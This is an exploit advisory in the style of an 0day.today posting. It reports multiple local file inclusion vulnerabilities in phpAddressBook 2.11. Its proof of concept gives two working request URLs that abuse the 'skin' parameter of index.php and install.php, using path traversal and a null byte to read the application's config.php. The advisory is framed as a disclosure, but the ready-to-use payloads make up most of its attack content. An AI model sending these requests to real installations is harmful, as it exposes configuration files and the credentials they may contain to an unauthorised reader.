id: 2760
date: 03/21/2008
title: phpAddressBook 2.11 Multiple Local File Inclusion Vulnerabilities
author: 0x90
cves: 

=================================================================
phpAddressBook 2.11 Multiple Local File Inclusion Vulnerabilities
=================================================================



      /  _  \ /\  /\ / _  \ /  _  \
      | | | | \ \/ / ||_| | | | | |
      | | | |  \  /  \_   | | | | |
      | |_| |  /  \   __\ | | |_| |
      \_____/ / /\ \ |____/ \_____/
              \/  \/


[~] phpAddressBook v2.11 Multiple Local File Inclusion Vulnerabilities

[~] Download: http://downloads.coronamatrix.org/phpAddressBookv2.11.zip

[~] Founder: 0x90

[~] PoC:

   http://[host]/[path]/index.php?skin=/../config.php %00
   http://[host]/[path]/install.php?skin=/../config.php %00


Greetz: ...



#  0day.today [2023-03-21]  #